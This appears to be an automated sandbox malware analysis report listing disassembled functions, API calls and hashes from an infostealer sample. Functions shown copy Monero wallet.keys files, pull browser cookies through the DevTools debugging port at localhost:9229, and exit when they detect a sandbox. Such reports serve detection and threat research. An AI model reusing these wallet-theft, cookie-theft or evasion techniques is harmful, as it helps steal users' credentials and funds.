
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 07b1246ccb0bbefb617362b718a834dabea3a0a984fd36a4a01b11cad06c9901
Instruction ID: 771afeffac1f5daab19abb2b4291e87e2d33ed1158f025321b80904726b76e77
Opcode Fuzzy Hash: 07b1246ccb0bbefb617362b718a834dabea3a0a984fd36a4a01b11cad06c9901
Instruction Fuzzy Hash: E19002F0351314464A1217706C0E60666B49B48772BD118A56415C4154DB555485565D

Function 00766E8C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: ed16fb82652de83545eef5a46a80158bb2f9c4aea38c636cb3030064d659ab71
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 6E118E76340100AFDB44DF55DC91EA673EAFB88320B698069ED06CB312D67AEC02C760

Function 00810D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 3178929b01d798fa34d4ef378dbf52f0378e04f11d2b01edb067f4173028140d
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: CC01DF72A006048FDB21CF60DC04BEA33A9FF86306F1545A4D90AD7285E3B0A8C18F80

Function 00839C73 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 00839C87
free.MSVCRT ref: 00839C8F
free.MSVCRT ref: 00839C97
free.MSVCRT ref: 00839C9F
free.MSVCRT ref: 00839CA7
free.MSVCRT ref: 00839CAF
free.MSVCRT ref: 00839CB6
free.MSVCRT ref: 00839CBE
free.MSVCRT ref: 00839CC6
free.MSVCRT ref: 00839CCE
free.MSVCRT ref: 00839CD6
free.MSVCRT ref: 00839CDE
free.MSVCRT ref: 00839CE6
free.MSVCRT ref: 00839CEE
free.MSVCRT ref: 00839CF6
free.MSVCRT ref: 00839CFE
free.MSVCRT ref: 00839D09
free.MSVCRT ref: 00839D11
free.MSVCRT ref: 00839D19
free.MSVCRT ref: 00839D21
free.MSVCRT ref: 00839D29
free.MSVCRT ref: 00839D31
free.MSVCRT ref: 00839D39
free.MSVCRT ref: 00839D41
free.MSVCRT ref: 00839D49
free.MSVCRT ref: 00839D51
free.MSVCRT ref: 00839D59
free.MSVCRT ref: 00839D61
free.MSVCRT ref: 00839D69
free.MSVCRT ref: 00839D71
free.MSVCRT ref: 00839D79
free.MSVCRT ref: 00839D81
free.MSVCRT ref: 00839D8F
free.MSVCRT ref: 00839D9A
free.MSVCRT ref: 00839DA5
free.MSVCRT ref: 00839DB0
free.MSVCRT ref: 00839DBB
free.MSVCRT ref: 00839DC6
free.MSVCRT ref: 00839DD1
free.MSVCRT ref: 00839DDC
free.MSVCRT ref: 00839DE7
free.MSVCRT ref: 00839DF2
free.MSVCRT ref: 00839DFD
free.MSVCRT ref: 00839E08
free.MSVCRT ref: 00839E13
free.MSVCRT ref: 00839E1E
free.MSVCRT ref: 00839E29
free.MSVCRT ref: 00839E34
free.MSVCRT ref: 00839E42
free.MSVCRT ref: 00839E4D
free.MSVCRT ref: 00839E58
free.MSVCRT ref: 00839E63
free.MSVCRT ref: 00839E6E
free.MSVCRT ref: 00839E79
free.MSVCRT ref: 00839E84
free.MSVCRT ref: 00839E8F
free.MSVCRT ref: 00839E9A
free.MSVCRT ref: 00839EA5
free.MSVCRT ref: 00839EB0
free.MSVCRT ref: 00839EBB
free.MSVCRT ref: 00839EC6
free.MSVCRT ref: 00839ED1
free.MSVCRT ref: 00839EDC
free.MSVCRT ref: 00839EE7
free.MSVCRT ref: 00839EF5
free.MSVCRT ref: 00839F00
free.MSVCRT ref: 00839F0B
free.MSVCRT ref: 00839F16
free.MSVCRT ref: 00839F21
free.MSVCRT ref: 00839F2C
free.MSVCRT ref: 00839F37
free.MSVCRT ref: 00839F42
free.MSVCRT ref: 00839F4D
free.MSVCRT ref: 00839F58
free.MSVCRT ref: 00839F63
free.MSVCRT ref: 00839F6E
free.MSVCRT ref: 00839F79
free.MSVCRT ref: 00839F84
free.MSVCRT ref: 00839F8F
free.MSVCRT ref: 00839F9A
free.MSVCRT ref: 00839FA8
free.MSVCRT ref: 00839FB3
free.MSVCRT ref: 00839FBE
free.MSVCRT ref: 00839FC9
free.MSVCRT ref: 00839FD4
free.MSVCRT ref: 00839FDF

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: 218a5322dff06a608c061d3036305e8802b9d61be192f4ddc8f0657dd19625b5
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 3771E6B2415B06DBE7733B39DD43A4976A1FFC8B00F104924B1D6A053E9A22E86797D2

Function 00828A1F Relevance: 66.4, APIs: 44, Instructions: 386stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?), ref: 00828A51

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

StrStrA.SHLWAPI(?,00638C08), ref: 00828A76
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828A95
lstrlen.KERNEL32(?), ref: 00828AA8
wsprintfA.USER32 ref: 00828AB8
lstrcpy.KERNEL32(?,?), ref: 00828ACE
StrStrA.SHLWAPI(?,00638C94), ref: 00828AFB
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828B22
lstrlen.KERNEL32(?), ref: 00828B35
wsprintfA.USER32 ref: 00828B45
lstrcpy.KERNEL32(?,006393D0), ref: 00828B5B
StrStrA.SHLWAPI(?,00638C5C), ref: 00828B88
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828BA7
lstrlen.KERNEL32(?), ref: 00828BBA
wsprintfA.USER32 ref: 00828BCA
lstrcpy.KERNEL32(?,?), ref: 00828BE0
StrStrA.SHLWAPI(?,00638ABC), ref: 00828C0D
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828C2C
lstrlen.KERNEL32(?), ref: 00828C3F
wsprintfA.USER32 ref: 00828C4F
lstrcpy.KERNEL32(?,?), ref: 00828C65
StrStrA.SHLWAPI(?,00638AD0), ref: 00828C92
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828CB9
lstrlen.KERNEL32(?), ref: 00828CCC
wsprintfA.USER32 ref: 00828CDC
lstrcpy.KERNEL32(?,006393D0), ref: 00828CF2
StrStrA.SHLWAPI(?,0063891C), ref: 00828D1F
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828D3E
lstrlen.KERNEL32(?), ref: 00828D51
wsprintfA.USER32 ref: 00828D61
lstrcpy.KERNEL32(?,?), ref: 00828D77
StrStrA.SHLWAPI(?,00638D3C), ref: 00828DA4
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828DC3
lstrlen.KERNEL32(?), ref: 00828DD6
wsprintfA.USER32 ref: 00828DE6
lstrcpy.KERNEL32(?,?), ref: 00828DFC
StrStrA.SHLWAPI(?,00638B34), ref: 00828E29
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00828E50
lstrlen.KERNEL32(?), ref: 00828E63
wsprintfA.USER32 ref: 00828E73
lstrcpy.KERNEL32(?,006393D0), ref: 00828E89
lstrlen.KERNEL32(?), ref: 00828EAE
lstrcpy.KERNEL32(00000000,?), ref: 00828EE3
strtok_s.MSVCRT ref: 00829001

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcpynwsprintf$FolderPathstrtok_s
String ID:
API String ID: 2042561329-0
Opcode ID: 0d8bc6c7416f32afe7bc549a8b03aa7c38963942a56c6291368496598bc34eeb
Instruction ID: da117db2c4807f002b3ada2bd5a2b82123fa094370f2e7e3fc037d522e83d33b
Opcode Fuzzy Hash: 0d8bc6c7416f32afe7bc549a8b03aa7c38963942a56c6291368496598bc34eeb
Instruction Fuzzy Hash: A3E13BB1A01214AFDB10DB68DD48ADA77BAEF88300F144199F909E7350DBB4AE45CFE1

Function 008121E0 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00812206
lstrlen.KERNEL32(006389F0), ref: 00812215
lstrcpy.KERNEL32(00000000,?), ref: 00812242
lstrcat.KERNEL32(00000000,?), ref: 0081224A
lstrlen.KERNEL32(0043179C), ref: 00812255
lstrcpy.KERNEL32(00000000,00000000), ref: 00812275
lstrcat.KERNEL32(00000000,0043179C), ref: 00812281
lstrcpy.KERNEL32(00000000,?), ref: 008122A9
lstrcat.KERNEL32(00000000,00000000), ref: 008122B4
lstrlen.KERNEL32(0043179C), ref: 008122BF
lstrcpy.KERNEL32(00000000,00000000), ref: 008122DC
lstrcat.KERNEL32(00000000,0043179C), ref: 008122E8
lstrcpy.KERNEL32(00000000,00000000), ref: 00812313
lstrlen.KERNEL32(?), ref: 0081234B
lstrcpy.KERNEL32(00000000,00000000), ref: 0081236B
lstrcat.KERNEL32(00000000,?), ref: 00812379
lstrcpy.KERNEL32(00000000,00000000), ref: 008123A0
lstrlen.KERNEL32(0043179C), ref: 008123B2
lstrcpy.KERNEL32(00000000,00000000), ref: 008123D2
lstrcat.KERNEL32(00000000,0043179C), ref: 008123DE
lstrcpy.KERNEL32(00000000,00000000), ref: 00812404
lstrcat.KERNEL32(00000000,00000000), ref: 0081240F
lstrcpy.KERNEL32(00000000,00000000), ref: 0081243B
lstrlen.KERNEL32(?), ref: 00812451
lstrcpy.KERNEL32(00000000,00000000), ref: 00812471
lstrcat.KERNEL32(00000000,?), ref: 0081247F
lstrcpy.KERNEL32(00000000,00000000), ref: 008124A9
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008124E6
lstrlen.KERNEL32(00638CA4), ref: 008124F4
lstrcpy.KERNEL32(00000000,00000000), ref: 00812518
lstrcat.KERNEL32(00000000,00638CA4), ref: 00812520
lstrcpy.KERNEL32(00000000,00000000), ref: 0081255E
lstrcat.KERNEL32(00000000), ref: 0081256B
lstrcpy.KERNEL32(00000000,00000000), ref: 00812594
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008125BD
lstrcpy.KERNEL32(00000000,00000000), ref: 008125E9
lstrcpy.KERNEL32(00000000,00000000), ref: 00812626
DeleteFileA.KERNEL32(00000000), ref: 0081265E
FindNextFileA.KERNEL32(00000000,?), ref: 008126AB
FindClose.KERNEL32(00000000), ref: 008126BA

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
String ID:
API String ID: 2857443207-0
Opcode ID: b1261c134c0998df310c40dad93e1ff580a938206aa192ded5eda646fb2304dd
Instruction ID: c59ec7ec57bf4cc7dac170762aebca9c9852acd67a8d9d47af4266423b385885
Opcode Fuzzy Hash: b1261c134c0998df310c40dad93e1ff580a938206aa192ded5eda646fb2304dd
Instruction Fuzzy Hash: DBE129B5A012569BCB14AFA8CD89AEE77BEFF04304F044424F905E7251DB38DDA5CBA1

Function 00401190 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004011AA

Part of subcall function 00401120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
Part of subcall function 00401120: HeapAlloc.KERNEL32(00000000), ref: 0040113C
Part of subcall function 00401120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
Part of subcall function 00401120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
Part of subcall function 00401120: RegCloseKey.ADVAPI32(?), ref: 0040117D

lstrcatA.KERNEL32(?,00000000), ref: 004011C0
lstrlenA.KERNEL32(?), ref: 004011CD
lstrcatA.KERNEL32(?,.keys), ref: 004011E8
lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040121F
lstrlenA.KERNEL32(009092E0), ref: 0040122D
lstrcpy.KERNEL32(00000000,?), ref: 00401251
lstrcatA.KERNEL32(00000000,009092E0), ref: 00401259
lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401264
lstrcpy.KERNEL32(00000000,00000000), ref: 00401288
lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401294
lstrcpy.KERNEL32(00000000,00000000), ref: 004012BA
lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 004012FF
lstrlenA.KERNEL32(00910218), ref: 0040130E
lstrcpy.KERNEL32(00000000,?), ref: 00401335
lstrcatA.KERNEL32(00000000,?), ref: 0040133D
lstrcpy.KERNEL32(00000000,00000000), ref: 00401378
lstrcatA.KERNEL32(00000000), ref: 00401385
lstrcpy.KERNEL32(00000000,00000000), ref: 004013AC
CopyFileA.KERNEL32(?,?,00000001), ref: 004013D5
lstrcpy.KERNEL32(00000000,?), ref: 00401401
lstrcpy.KERNEL32(00000000,?), ref: 0040143D

Part of subcall function 0041EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0041EFF2

DeleteFileA.KERNEL32(?), ref: 00401471
memset.MSVCRT ref: 0040148E

Strings

\Monero\wallet.keys, xrefs: 0040125F, 0040128E
.keys, xrefs: 004011DC

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
String ID: .keys$\Monero\wallet.keys
API String ID: 2734118222-3586502688
Opcode ID: cf928a13bc8528b1e75e1d2c8bc4bc415152758f00e76aa7cb513ed16a1d9eb5
Instruction ID: 107083fb19e5d757d6b5f7c97fc85a8bb09bd95212823e3c222e070f8096506b
Opcode Fuzzy Hash: cf928a13bc8528b1e75e1d2c8bc4bc415152758f00e76aa7cb513ed16a1d9eb5
Instruction Fuzzy Hash: A9A17F71B102069BCB21AB79DD89A9F77B9AF44304F04007AF905F72E1DB78DD058BA8

Function 00825B67 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00825B9C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00825BCB
lstrcpy.KERNEL32(00000000,00000000), ref: 00825BFC
lstrcpy.KERNEL32(00000000,00000000), ref: 00825C24
lstrcat.KERNEL32(00000000,00000000), ref: 00825C2F
lstrcpy.KERNEL32(00000000,00000000), ref: 00825C57
lstrcpy.KERNEL32(00000000,00000000), ref: 00825C8F
lstrcat.KERNEL32(00000000,00000000), ref: 00825C9A
lstrcpy.KERNEL32(00000000,00000000), ref: 00825CBF
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00825CF5
lstrcpy.KERNEL32(00000000,00000000), ref: 00825D1D
lstrcat.KERNEL32(00000000,00000000), ref: 00825D28
lstrcpy.KERNEL32(00000000,00000000), ref: 00825D4F
lstrlen.KERNEL32(0043179C), ref: 00825D61
lstrcpy.KERNEL32(00000000,00000000), ref: 00825D80
lstrcat.KERNEL32(00000000,0043179C), ref: 00825D8C
lstrlen.KERNEL32(00638DD8), ref: 00825D9B
lstrcpy.KERNEL32(00000000,00000000), ref: 00825DBE
lstrcat.KERNEL32(00000000,00000000), ref: 00825DC9
lstrcpy.KERNEL32(00000000,00000000), ref: 00825DF3
lstrcpy.KERNEL32(00000000,00000000), ref: 00825E1F
GetFileAttributesA.KERNEL32(00000000), ref: 00825E26
lstrcpy.KERNEL32(00000000,?), ref: 00825E7E
lstrcpy.KERNEL32(00000000,?), ref: 00825EF4
lstrcpy.KERNEL32(00000000,?), ref: 00825F1D
lstrcpy.KERNEL32(00000000,?), ref: 00825F50
lstrcpy.KERNEL32(00000000,00000000), ref: 00825F7C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00825FB6
lstrcpy.KERNEL32(00000000,?), ref: 00826013
lstrcpy.KERNEL32(00000000,00000000), ref: 00826037

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
String ID:
API String ID: 2428362635-0
Opcode ID: 4c0de8b9607b3dae64bf6b53f6e62537ebce006a950589915d47254386edbdb5
Instruction ID: f796ca2508b5a1ac05b4e48ba5a25bc0a3ade1699e58febca2dbf63220539039
Opcode Fuzzy Hash: 4c0de8b9607b3dae64bf6b53f6e62537ebce006a950589915d47254386edbdb5
Instruction Fuzzy Hash: 0D02ADB0A016669FCB24AF78D989AAE7BF9FF44304F144428F805E7250DB34DD95CBA1

Function 008267D7 Relevance: 43.9, APIs: 29, Instructions: 438stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082680C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826847
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00826871
lstrcpy.KERNEL32(00000000,00000000), ref: 008268A8
lstrcpy.KERNEL32(00000000,00000000), ref: 008268CD
lstrcat.KERNEL32(00000000,00000000), ref: 008268D5
lstrcpy.KERNEL32(00000000,00000000), ref: 008268FE

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: d444b227fe8bf0be55f2ee79b7281dddaa967b0a97a90003e47ec98e63fb4faa
Instruction ID: 4ac65a8689264af637fffb11edf98d2e9e8f88012b262e0c06e9168f0d9d5c4e
Opcode Fuzzy Hash: d444b227fe8bf0be55f2ee79b7281dddaa967b0a97a90003e47ec98e63fb4faa
Instruction Fuzzy Hash: EDF184B09012669BCB15AF78DC49AAD7BB9FF04304F048528F815E7291EB78DCE5CB91

Function 00832027 Relevance: 43.7, APIs: 29, Instructions: 218stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 00836860
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 00836879
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 00836891
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 008368A9
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 008368C2
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 008368DA
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 008368F2
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0083690B
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 00836923
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0083693B
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 00836954
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0083696C
Part of subcall function 00836807: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 00836984

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00832066
ExitProcess.KERNEL32 ref: 0083209E
GetSystemInfo.KERNEL32(?), ref: 008320A8
ExitProcess.KERNEL32 ref: 008320B6

Part of subcall function 00811297: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008112AD
Part of subcall function 00811297: VirtualAllocExNuma.KERNEL32(00000000), ref: 008112B4
Part of subcall function 00811297: ExitProcess.KERNEL32 ref: 008112BF

Part of subcall function 00811327: GlobalMemoryStatusEx.KERNEL32 ref: 00811351
Part of subcall function 00811327: ExitProcess.KERNEL32 ref: 0081137B

GetUserDefaultLangID.KERNEL32 ref: 008320C6
ExitProcess.KERNEL32 ref: 00832118

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtuallstrcpy
String ID:
API String ID: 1589815927-0
Opcode ID: 93640e03c3836f20208e9c97ebb38f71becffdefc605de61920b8a9654901af0
Instruction ID: e5b16ffb092a83ce836e8992bc2335794a79f60df90b96ffb726c9c948d33bfd
Opcode Fuzzy Hash: 93640e03c3836f20208e9c97ebb38f71becffdefc605de61920b8a9654901af0
Instruction Fuzzy Hash: 4B719271500216AFCB24ABB8DD89BAE7BBAFF85705F145018F905E71A1DF74A801CBE1

Function 004092B0 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 368stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004090C0: InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
Part of subcall function 004090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
Part of subcall function 004090C0: InternetCloseHandle.WININET(00000000), ref: 00409109
Part of subcall function 004090C0: strlen.MSVCRT ref: 00409125

strlen.MSVCRT ref: 004092E1
strlen.MSVCRT ref: 004092FA

Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FAF
Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FE8

Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996

memset.MSVCRT ref: 00409341
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
lstrcatA.KERNEL32(?,00000000), ref: 00409372
strlen.MSVCRT ref: 00409399
strlen.MSVCRT ref: 004093E6
memcmp.MSVCRT(?,Function_0002CFF4,?), ref: 0040940B
memset.MSVCRT ref: 00409532
lstrcatA.KERNEL32(?,cookies), ref: 00409547
lstrcatA.KERNEL32(?,0043179C), ref: 00409559
lstrcatA.KERNEL32(?,?), ref: 0040956A
lstrcatA.KERNEL32(?,00434BA0), ref: 0040957C
lstrcatA.KERNEL32(?,?), ref: 0040958D
lstrcatA.KERNEL32(?,.txt), ref: 0040959F
lstrlenA.KERNEL32(?), ref: 004095B6
lstrlenA.KERNEL32(?), ref: 004095DB
memset.MSVCRT ref: 0040965C

Strings

/devtools, xrefs: 004092F5, 00409300
localhost, xrefs: 004092CA, 004092E8
ws://localhost:9229, xrefs: 00409350
.txt, xrefs: 00409593
cookies, xrefs: 0040953B

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentstd::_
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2839775910-3542011879
Opcode ID: a92578da6473bd7799edd4b0289a0310e05385e99b30de33052bf4a441d899b0
Instruction ID: 3ff406b821a2a8bd650e56e22cbde8bd7afbb954c6312c17c328fe5009f992c9
Opcode Fuzzy Hash: a92578da6473bd7799edd4b0289a0310e05385e99b30de33052bf4a441d899b0
Instruction Fuzzy Hash: 52E11771E00218DBDF14DFA9D984ADEBBB5BF48304F10446AE509B7281DB78AE45CF98

Function 00824737 Relevance: 39.3, APIs: 26, Instructions: 334stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082476A
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082479D
lstrcpy.KERNEL32(00000000,?), ref: 008247C5
lstrcat.KERNEL32(00000000,00000000), ref: 008247D0
lstrlen.KERNEL32(00434CF8), ref: 008247DB
lstrcpy.KERNEL32(00000000,00000000), ref: 008247F8
lstrcat.KERNEL32(00000000,00434CF8), ref: 00824804
lstrcpy.KERNEL32(00000000,00000000), ref: 0082482D
lstrcat.KERNEL32(00000000,00000000), ref: 00824838
lstrcpy.KERNEL32(00000000,00000000), ref: 0082485F
lstrcpy.KERNEL32(00000000,?), ref: 0082489E
lstrcat.KERNEL32(00000000,?), ref: 008248A6
lstrlen.KERNEL32(0043179C), ref: 008248B1
lstrcpy.KERNEL32(00000000,00000000), ref: 008248CE
lstrcat.KERNEL32(00000000,0043179C), ref: 008248DA
lstrlen.KERNEL32(00434D0C), ref: 008248E5
lstrcpy.KERNEL32(00000000,00000000), ref: 00824902
lstrcat.KERNEL32(00000000,00434D0C), ref: 0082490E
lstrcpy.KERNEL32(00000000,00000000), ref: 00824935
lstrcpy.KERNEL32(00000000,?), ref: 00824967
GetFileAttributesA.KERNEL32(00000000), ref: 0082496E
lstrcpy.KERNEL32(00000000,?), ref: 008249C8
lstrcpy.KERNEL32(00000000,?), ref: 008249F1
lstrcpy.KERNEL32(00000000,?), ref: 00824A1A
lstrcpy.KERNEL32(00000000,?), ref: 00824A42
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00824A76

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
String ID:
API String ID: 1033685851-0
Opcode ID: 151c12d29992a9d431ca2520ffd1a9afe9f302ff394a83d698b1c3f5775c368b
Instruction ID: a433ce5437f6a6e2f70152cc394389b7c0ac804b06ce373c2f3d056bd0bf5330
Opcode Fuzzy Hash: 151c12d29992a9d431ca2520ffd1a9afe9f302ff394a83d698b1c3f5775c368b
Instruction Fuzzy Hash: CFB1A4B1A012669BCB14EF78DD89AAE7BA9FF04304F045428F905E7251DB74DC94CBA1

Function 008199D3 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 236stringsleepprocessCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 00819A07
lstrcat.KERNEL32(?,?), ref: 00819A18
lstrcat.KERNEL32(?,00434BAC), ref: 00819A2A

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
